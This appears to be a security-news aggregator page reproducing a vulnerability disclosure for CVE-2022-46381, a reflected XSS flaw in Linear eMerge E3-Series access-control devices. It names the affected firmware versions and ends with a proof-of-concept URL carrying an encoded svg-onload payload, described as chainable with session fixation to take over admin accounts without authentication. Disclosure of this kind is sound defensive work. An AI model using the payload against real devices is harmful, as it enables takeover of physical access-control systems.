Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-46381: Security-Research/CVE-2022-46381.txt at main · omarhashem123/Security-Research

Certain Linear eMerge E3-Series devices are vulnerable to XSS via the type parameter (e.g., to the badging/badge_template_v0.php component). This affects 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e.

CVE
Open in Source
#xss#vulnerability#php#auth

# Exploit Title: Linear eMerge E3-Series devices are vulnerable to XSS via the “type” parameter

# Exploit Author: Omar Hashim

# Version: 0.32-08f, 0.32-07p, 0.32-07e, 0.32-09c, 0.32-09b, 0.32-09a, and 0.32-08e

# Vendor home page: https://na.niceforyou.com/brands/linear/

# Vendor home page: https://www.nortekcontrol.com/access-control/

# Vendor home page: https://linear-solutions.com/

# Authentication Required: No

# CVE : CVE-2022-46381

# Description

====================

Linear eMerge E3-Series were discovered to contain a Reflected XSS vulnerability via the “type” parameter that can be chained with the local session fixation to takeover admin or less privileged users accounts.

#Proof Of Concept:

====================

http://<HOST:PORT>/badging/badge_template_v0.php?layout=1&type=%22%2F%3E%3Csvg%2Fonload%3D%22alert%28cookie%29%22%2F%3E

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE